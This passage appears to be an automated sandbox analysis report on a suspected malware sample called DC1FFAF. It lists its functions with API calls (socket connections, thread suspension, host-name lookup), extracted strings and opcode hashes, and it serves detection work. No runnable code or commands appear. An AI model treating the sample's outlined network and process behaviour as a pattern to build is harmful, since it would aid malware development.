                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                                                                                                                                      • String ID: .CHM$.HLP$.INI
                                                                                                                                      • API String ID: 1153805871-4017452060
                                                                                                                                      • Opcode ID: 469f076e895f697ac0f4917be85a32e239f375fcaa87e415ff7243e493ff1af8
                                                                                                                                      • Instruction ID: 3e1f422c56751a0ccaae0663ef7d4bacb360fb1c48429a948541e49c3b2a4fa0
                                                                                                                                      • Opcode Fuzzy Hash: 469f076e895f697ac0f4917be85a32e239f375fcaa87e415ff7243e493ff1af8
                                                                                                                                      • Instruction Fuzzy Hash: B54152759043199BDB11DB65CE84B8A77FCAF04318F2059AAE495EB244EB70DA84CB50
                                                                                                                                      Function 69EA4990 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 61networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Startup__strlwrgethostname
                                                                                                                                      • String ID: D$S$a$e$f$j$s
                                                                                                                                      • API String ID: 3543222892-4186746316
                                                                                                                                      • Opcode ID: 9ccfd0149d79be3ec261083412bfa699db5fde6dfab49b8e34ec19eb27820fc8
                                                                                                                                      • Instruction ID: 52f38dd349a6f0f730a656cb9151b46b04df78652be91b476c683d60cd8bb82a
                                                                                                                                      • Opcode Fuzzy Hash: 9ccfd0149d79be3ec261083412bfa699db5fde6dfab49b8e34ec19eb27820fc8
                                                                                                                                      • Instruction Fuzzy Hash: EA218E34A0D7C08FF322822895547DB7FD45F97308F14459ED4DA8B296FAB6450883A7
                                                                                                                                      Function 004451F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 226COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$_malloc
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 3506388080-3110715001
                                                                                                                                      • Opcode ID: d4c1e17bb197fdfaf3307347a6f986245046b4ba8875ba13823f84c3879760c3
                                                                                                                                      • Instruction ID: 1f2b7ffcb84e481be28a9a8db2b900b49b51409ff8c890b8e2bbf7baa3a5501f
                                                                                                                                      • Opcode Fuzzy Hash: d4c1e17bb197fdfaf3307347a6f986245046b4ba8875ba13823f84c3879760c3
                                                                                                                                      • Instruction Fuzzy Hash: 99A17E70D046189BDB24DF20CC81BD9B3B6EF88308F0041D9E40D67282EB7AAE95CF85
                                                                                                                                      Function 0043F5C0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 116windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(?,000000B1,?,?), ref: 0043F76C
                                                                                                                                      • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0043F786
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID: Alt + $Ctrl + $Shift +
                                                                                                                                      • API String ID: 3850602802-354013472
                                                                                                                                      • Opcode ID: 7bc2f6c47b020748fd4a5c5667be6ff81e6cf5f63d7bacb5ff8f5e772d42ccc6
                                                                                                                                      • Instruction ID: e47a1ee93af4177210a1e7dc87acd4a560de138ca341d1c3b9d97cf8e8e58a77
                                                                                                                                      • Opcode Fuzzy Hash: 7bc2f6c47b020748fd4a5c5667be6ff81e6cf5f63d7bacb5ff8f5e772d42ccc6
                                                                                                                                      • Instruction Fuzzy Hash: A2417FB0E00208EFDB04DB95D546FEEB7B6EF48308F24407AE5056B291D7795E0ACB99
                                                                                                                                      Function 004E7670 Relevance: 15.5, APIs: 10, Instructions: 480COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 004E76B8
                                                                                                                                        • Part of subcall function 004E88B0: MultiByteToWideChar.KERNEL32(004E76D5,00000000,?,000000FF,00000000,00000000,?,?,004E76D5,?,?,00000000), ref: 004E88C4
                                                                                                                                      • _memset.LIBCMT ref: 004E76F6
                                                                                                                                      • _memset.LIBCMT ref: 004E7713
                                                                                                                                      • _memset.LIBCMT ref: 004E7792
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$ByteCharMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1513958732-0
                                                                                                                                      • Opcode ID: 20f9032e1647c989c44b5babbdfdde1993317b81aa928302ff22cd647ffd2079
                                                                                                                                      • Instruction ID: 61a16014e45019a02d6b67c9066b2887d521967acbe1d3b6dd74be3605f2bf9f
                                                                                                                                      • Opcode Fuzzy Hash: 20f9032e1647c989c44b5babbdfdde1993317b81aa928302ff22cd647ffd2079
                                                                                                                                      • Instruction Fuzzy Hash: 24226AB1900218AFDB20DF55CC85BAAB7B8BF58315F10C2D9E509A7280DB75ABC5CF94
                                                                                                                                      Function 00465E70 Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 00465E88
                                                                                                                                        • Part of subcall function 004983AD: __FF_MSGBANNER.LIBCMT ref: 004983D0
                                                                                                                                        • Part of subcall function 004983AD: __NMSG_WRITE.LIBCMT ref: 004983D7
                                                                                                                                        • Part of subcall function 004983AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,004A296A,?,00000001,?,?,004A1322,00000018,00516498,0000000C,004A13B3), ref: 00498424
                                                                                                                                      • _memset.LIBCMT ref: 00465EA4
                                                                                                                                      • _memset.LIBCMT ref: 00465EC1
                                                                                                                                        • Part of subcall function 00465B20: __strlwr.LIBCMT ref: 00465BA3
                                                                                                                                      • _memset.LIBCMT ref: 00465EED
                                                                                                                                      • _sprintf.LIBCMT ref: 00465F0C
                                                                                                                                      • _memset.LIBCMT ref: 00465F29
                                                                                                                                      • _strlen.LIBCMT ref: 00465F38
                                                                                                                                      • _strlen.LIBCMT ref: 00465F5E
                                                                                                                                      • _strlen.LIBCMT ref: 00465FC0
                                                                                                                                      • _strlen.LIBCMT ref: 00466001
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset_strlen$AllocateHeap__strlwr_malloc_sprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1032763385-0
                                                                                                                                      • Opcode ID: 0aaa7fc4e21d28772e940ff9bbca098a054b1a71b7dd17d654df15d296f7e7c4
                                                                                                                                      • Instruction ID: e23972ec357df16ccd428ec72ae8ebdb9b51b294256c2da38a60f693703d7baf
                                                                                                                                      • Opcode Fuzzy Hash: 0aaa7fc4e21d28772e940ff9bbca098a054b1a71b7dd17d654df15d296f7e7c4
                                                                                                                                      • Instruction Fuzzy Hash: 7C41A7B2C002185BDF25D761EC42FDD777C6B58708F4404EAE60966242FA759B88CF96
                                                                                                                                      Function 00465CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen$_memset$__strlwr
                                                                                                                                      • String ID: Baidunetdisk
                                                                                                                                      • API String ID: 1964462105-1556622174
                                                                                                                                      • Opcode ID: 62e13ba9b269a84e3ebac39549ddda972c2e0cda1084790be7c651faf64d1748
                                                                                                                                      • Instruction ID: d103d7ae1def14bcc7e29e57694d3e7439abc074df1be9e957dcaf8d4d7fa40d
                                                                                                                                      • Opcode Fuzzy Hash: 62e13ba9b269a84e3ebac39549ddda972c2e0cda1084790be7c651faf64d1748
                                                                                                                                      • Instruction Fuzzy Hash: 9541E5B1C042989BCF22D761DC85BCE7BBC5B25308F4400DDE40866283E6799B8CCFA6
                                                                                                                                      Function 69E8D970 Relevance: 13.6, APIs: 9, Instructions: 116networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 69E8D995
                                                                                                                                      • ioctlsocket.WS2_32 ref: 69E8D9B1
                                                                                                                                      • htons.WS2_32(?), ref: 69E8D9E1
                                                                                                                                      • inet_addr.WS2_32(?), ref: 69E8DA15
                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 69E8DA30
                                                                                                                                      • WSAGetLastError.WS2_32 ref: 69E8DA41
                                                                                                                                      • select.WS2_32(?,00000000,?,?,?), ref: 69E8DAA7
                                                                                                                                      • __WSAFDIsSet.WS2_32(?,00000001), ref: 69E8DAC8
                                                                                                                                      • __WSAFDIsSet.WS2_32(?,?), ref: 69E8DAE1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastconnecthtonsinet_addrioctlsocketselectsocket
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1968875722-0
                                                                                                                                      • Opcode ID: eea0d52a7ba03fb64b6b4dba07d6a0afe3daca336facd6fcf5d42a7957b4a5cc
                                                                                                                                      • Instruction ID: 8226ca4881fcba8ae2f696d302022643ed5528127ca24f86858c8d78e9b1c332
                                                                                                                                      • Opcode Fuzzy Hash: eea0d52a7ba03fb64b6b4dba07d6a0afe3daca336facd6fcf5d42a7957b4a5cc
                                                                                                                                      • Instruction Fuzzy Hash: AE417175608341AFDB10CF64C948BABB7E8FB88314F208A5EF549D7240E774EA45CB62
                                                                                                                                      Function 69E92100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148synchronizationCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E92124
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • _memset.LIBCMT ref: 69E92151
                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?), ref: 69E92161
                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000BB8,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 69E921CB
                                                                                                                                      • _malloc.LIBCMT ref: 69E9227E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$AllocateCreateEventHeapObjectSingleWait_memset
                                                                                                                                      • String ID: %d.%d.%d.%d
                                                                                                                                      • API String ID: 358140155-3491811756
                                                                                                                                      • Opcode ID: 274ff82b50173d6d5d68b334a5fd1d9523f4831ba2850559bcce062c553426f3
                                                                                                                                      • Instruction ID: 5b7bf7ea3fc1f82901cc4b0ee1c3e912b683ad2177025f1b95263e23dc730df8
                                                                                                                                      • Opcode Fuzzy Hash: 274ff82b50173d6d5d68b334a5fd1d9523f4831ba2850559bcce062c553426f3
                                                                                                                                      • Instruction Fuzzy Hash: E55104749483019FDB04CF25D941BABBBE4AF99308F14845DF889DB380D730D609CBA2
                                                                                                                                      Function 00476407 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 00476427
                                                                                                                                      • ResumeThread.KERNEL32(?,00000000,00000001,?,?,?,00000001,?,?,00000000,?,00463F02,00463DE0,00000000,00000000,00000000), ref: 004764A8
                                                                                                                                      • FindCloseChangeNotification.KERNEL32(?,00000000,00000001,?,?,?,00000001,?,?,00000000,?,00463F02,00463DE0,00000000,00000000,00000000), ref: 004764C1
                                                                                                                                      • Wow64SuspendThread.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,00000001,?,?,00000000,?,00463F02,00463DE0,00000000), ref: 004764CD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Thread$ChangeCloseFindNotificationResumeSuspendWow64_memset
                                                                                                                                      • String ID: =F
                                                                                                                                      • API String ID: 3066563367-291911815
                                                                                                                                      • Opcode ID: 70e7a53b8883650703636e1d12386513e12757e5bbb9c81c00651c7f3992c071
                                                                                                                                      • Instruction ID: 0752cac46652a0e4e04973af1e1ba56f4e6c72c10bd18e9fc9ce2452e2ba52d1
                                                                                                                                      • Opcode Fuzzy Hash: 70e7a53b8883650703636e1d12386513e12757e5bbb9c81c00651c7f3992c071
                                                                                                                                      • Instruction Fuzzy Hash: F141D171C00609BFDF21AFB18C409EFBAAAAF04354F11856AF518A2261D7388E51DB99
                                                                                                                                      Function 0049939E Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__filbuf__fileno__read_memcpy_s
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3061097587-0
                                                                                                                                      • Opcode ID: 023243baa59aee6cb9a76ed8403a3c3227e866a9f381994b04a0c4ebedf03958
                                                                                                                                      • Instruction ID: f9a449022f2c98132593fa8de60adbadea3fbdd1964edf67f484835a105ace21
                                                                                                                                      • Opcode Fuzzy Hash: 023243baa59aee6cb9a76ed8403a3c3227e866a9f381994b04a0c4ebedf03958
                                                                                                                                      • Instruction Fuzzy Hash: 5551B131900204ABCF219F6D884499FBFB5EF84324F25863EE825962D0E7789E52CB59
                                                                                                                                      Function 69E85F50 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EA4AC0: _memset.LIBCMT ref: 69EA4AF3
                                                                                                                                        • Part of subcall function 69EA4AC0: _memset.LIBCMT ref: 69EA4B16
                                                                                                                                      • _memset.LIBCMT ref: 69E85FD1
                                                                                                                                      • _memset.LIBCMT ref: 69E85FE5
                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 69E86046
                                                                                                                                      • _strncpy.LIBCMT ref: 69E860D6
                                                                                                                                      • _strncpy.LIBCMT ref: 69E860F9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$_strncpy$DirectoryWindows
                                                                                                                                      • String ID: .sys
                                                                                                                                      • API String ID: 4209668992-15676193
                                                                                                                                      • Opcode ID: d3e728e69f6dfcd22df79d57eead59a4d70292094450772c96dee6ff089dedcf
                                                                                                                                      • Instruction ID: a0da8e175d53b6241e87cf88cce9f914ecfe48920b25a12c99527537323c0b09
                                                                                                                                      • Opcode Fuzzy Hash: d3e728e69f6dfcd22df79d57eead59a4d70292094450772c96dee6ff089dedcf
                                                                                                                                      • Instruction Fuzzy Hash: F751D13021C3859FC316DF389564AABBBE6AFCA304F54896DE4CAC7311E671954CC786
                                                                                                                                      Function 0044C3D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 155COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 0-3110715001
                                                                                                                                      • Opcode ID: 7693029edef7e6182989cc7ce8af12a2eee38a47f6a99be9470fdf94518f8d23
                                                                                                                                      • Instruction ID: 4084f03e9e0f0e35b9682d0e537124f01407e03c1571e0154949fa4721bf1d9b
                                                                                                                                      • Opcode Fuzzy Hash: 7693029edef7e6182989cc7ce8af12a2eee38a47f6a99be9470fdf94518f8d23
                                                                                                                                      • Instruction Fuzzy Hash: AB6170B09013688BDB65DB15DC91BEEB7B8AF50308F0480EE920966242DB746F89CF59
                                                                                                                                      Function 0044B590 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: socket
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 98920635-3110715001
                                                                                                                                      • Opcode ID: 536783bb566295a52f7584337fc17bde8c49a852d22334a36bbe376887814cb5
                                                                                                                                      • Instruction ID: 40641f6438f321657bc2c95c5aee308aa46fa26077111ef331c588c91e61e698
                                                                                                                                      • Opcode Fuzzy Hash: 536783bb566295a52f7584337fc17bde8c49a852d22334a36bbe376887814cb5
                                                                                                                                      • Instruction Fuzzy Hash: 985180749011299BEF24EB55DD99FEEB7B5AF94308F0040DED10967282EB389E84CF94
                                                                                                                                      Function 0044B7E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: socket
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 98920635-3110715001
                                                                                                                                      • Opcode ID: bfd6d90df6e4d0d481212caac65557093a79532a3c6d269f180e65141a8ab544
                                                                                                                                      • Instruction ID: ac3d775cdd14f105f3bdeb1554aeabecc8a4885d570daf2234de517a8a8b4228
                                                                                                                                      • Opcode Fuzzy Hash: bfd6d90df6e4d0d481212caac65557093a79532a3c6d269f180e65141a8ab544
                                                                                                                                      • Instruction Fuzzy Hash: 45515DB09011299BEF24EB55DC99FEEB7B5AF54308F0040DED10967282EB389E84CF94
                                                                                                                                      Function 00467870 Relevance: 10.6, APIs: 7, Instructions: 102COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseHandle_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 383035284-0
                                                                                                                                      • Opcode ID: 611a1078b22d6b14db4cff82a1720ac77727a4fc070779fe20d363009a8dfd99
                                                                                                                                      • Instruction ID: 003dae327013ba663ab80fd9c6a69be27a58493db63cbebbc20536c320a495f2
                                                                                                                                      • Opcode Fuzzy Hash: 611a1078b22d6b14db4cff82a1720ac77727a4fc070779fe20d363009a8dfd99
